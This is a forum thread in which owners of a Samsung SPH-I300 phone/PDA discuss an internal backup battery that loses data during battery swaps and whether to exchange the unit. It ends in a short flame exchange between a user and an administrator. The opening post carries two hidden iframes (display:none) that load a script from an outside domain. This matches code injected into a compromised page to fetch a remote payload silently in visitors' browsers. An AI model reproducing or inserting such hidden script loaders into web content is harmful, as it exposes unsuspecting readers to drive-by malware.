+ Reply to Thread

Question Internal battery seems to have started working?!?!

Not sure what's going on here, but my internal battery seems to have started working all of a sudden. To recap, I kept losing all my data when changing batteries. Diagnosis? Bad internal battery. I called Radio Shack and they authorized an exchange.

I won't go into what a hassle that was to setup, but suffice it to say a new phone is supposed to be arriving at my local RS store on Thursday. Last night I got curious about why there's no backup of voice dials so I decided to try Backup Buddy because the latest version is capable of backing up everything, even ROM. I backed everything up, then pulled my battery expecting it would lose all data again. Nope, plugged it back in and it worked (although the phone switches off--normal?). Changed batteries, worked fine. Pulled the battery and waited 20 seconds, worked fine.

Is it possible the initial charge of the internal battery needs to be longer than 24 hours? Or, do they sometimes work and sometimes not? Basically, should I still do the exchange or not? I don't want to make RS have to eat an expensive phone if there is truly nothing wrong with it, not to mention having to get everything switched and re-programmed, but I also don't want to end up keeping the phone only to find out later that the battery really is bad and it only works "sometimes."

Anyone had a similar experience, or have any advice for me?

Again, sorry so long--I wanted to convey all the details!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Mine did the same initially

I think the first few times I changed the battery on my I300, it did the same thing. It really surprised me -- seemed like a major design oversight. Since then, it hasn't ever done it again. Who knows .... maybe there's a "breaking in" period.

-Doug

My batteries have never functioned in this manner. What do you mean the phone switches off? 24 hours should be enough.

I have never had that problem. In fact, the first day I got my phone I did not leave it in the charger for a full 24 hours and I have not had a problem. I am sure my internal battery is fully charged but it does not osund like your problem is a "normal" issue that is common to the i300.

mjorange: phone switches off means just that--the phone switches off. I will have the phone and the Palm portion on. Turn the Palm off. Change the battery. Turn the I300 back on--and the phone is turned off. Am I supposed to turn the phone off manually before changing the battery? I only recall reading that I need to turn the Palm portion of the device off.

dtoombs: did you consider replacing yours?

neil7398: sounds like you're voting in favor of swapping out my phone--even though it's working now, it still isn't normal behavior overall.

I think I'll still do the exchange--who knows when the battery problem might arise again?

I have two I300's; (One for the wife). Her internal battery had problems until I left it in the charge for 3 days. No problem switching battery since.

Yes, my phone turns off when the battery is switched. I just always turn it back on.

Nate Vanderschaaf

Some have voiced concern over whether or not you should power off completely before changing batteries. I've even changed batteries without turning off the palm without issue. Never been a problem for me. I don't and the phone turning off is normal. I purchased 2 as well and, though mine has been crystal clean, the second was initially plagued with a poor internal battery. I am by all means a believer in exchanging if a defect is apparent as opposed to living with it as some have tried.

Exchange it for a new one. The last thing you want is to leave town and lose your info, as happened with the one I purchased for my mother.

"Backup" battery

The instructions that came with my unit said that "...an internal backup battery needs to be charged initially for 24 hours." and "Do not disconnect the main battery from the phone for 24 hours."

Evidently there's a trickle from the main battery to charge the backup unit. Hmmm... I wonder how much energy density is in that backup battery.
    The older I get, the better I was...

h: I'm not sure what "energy density" is, but it sounds like some kind of inertia or something--how much effort does it take to charge the battery, that kind of thing?

Anyway, I did read the instructions and gave the internal battery about 36 hours to charge, well beyond the minimal 24.

So, it's working now but I'm doubting how good the battery is. Samsung should either fix the QC problems with the phones, or change their recommendations on the initial charge. I mean, if 48 hours would fix all the problems, wouldn't that be easier than handling all these returns?

I read something in a thread, perhaps this one, about a bug in the internal battery that Samsung was examining. The phone I bought my mother had an internal battery problem and was charged the full 24 hours and more.

I replaced mine

I bought my SPH-I300 and plugged the battery in before checking if the ESN on the box was the same as on the phone (it was). I had to wait the 24hrs before I could activate the phone.

After it was activated, charged, all data downloaded from my old Palm (man, I can't even look at my ugly old Palm III now! ) whenever I switched batteries I'd lose all data.

To make a long story short, I had to go back and replace the phone (losing a screen protector in the bargain ).

Concerning the phone part turning off, I'd think it's a sensible safety feature. I'd rather have my phone turn off than use (a lot of) the charge up and lose my data!

Administrator

Arrow

dont any of you newbies to the phone/pda world read the manual.. ?

you should NOT sync the i300 with your old palm stuff...

you WILL encounter problems down the road....

Angry About newbies, manuals and politeness

Marctronixx,

Not that it's any of your business, but I did read the manual.

When I said "downloaded" I meant I created a new user, hot-synced it, backed the data files up, then replaced the phone number and calendar data files with my pre-existent ones. And it works fine, no problems at all -- I'll post detailed instructions if people need it.

Ok, I guess people like you probably need everything spelled out. I wonder, when people always assume the others are idiots, what this really tells about themselves...

I resent you calling me newbie, and I think the tone of your post was very unpolite (an amazing accomplishment in a 3 line post!).

Not that it really matters, but I've gone through two Palms, since 1997. I've *worked* (not played -- worked) with computers since 1983 -- I have a technical degree in computer science, a B.S. in Electrical and Computer Engineering and a graduate degree in Internet Technologies.

Next time before you post something take some time to think it through. Being polite is good for you and others, even if you think you're hiding behind some anonymous Internet handle.

Administrator

Arrow

heh.. is that a threat? if you want to meet me somewhere so we can "discuss" this in person, then send me a private message...

yeah thats what it looked like you did in your post, and YES you have to spell things out on a text-based board so others know exactly what you did.. too many folks on here have done just that and have had issues..

it doesnt matter how many palms you had.. the phone/pda world is not as tolerant as the palm only world..

im glad you have a degree, i hope you are putting it to good use..

i never offend anyone on this board on purpose, ask anyone here and they will tell you.. if you were offended then you read into the message i posted wrong...

i dont need posting tips from you.. everything i post is from experience.

misunderstanding

Ok, I guess I misunderstood the tone of your post. If you didn't mean to offend anyone, then all is fine. I have no intention of starting any flame war. Let's forget about everything.

But... I haven't been into a real fight for, let's see... some 18 years. Sometimes I've wished for one, just to vent the steam, but I refuse to fight for stupid reasons, so it never happened. If our little flame exchange is all settled now, and you're just talking about a friendly brawl, it could be fun...

See thats what I like to hear/read. Misunderstandings happen in discussions, and certainly in written discussions where its so easy to presume what the other party intended. It so often seems that its taken as apocalyptic when we disagree here.

Go ahead and keep on flaming, but try to be more erudite about it.....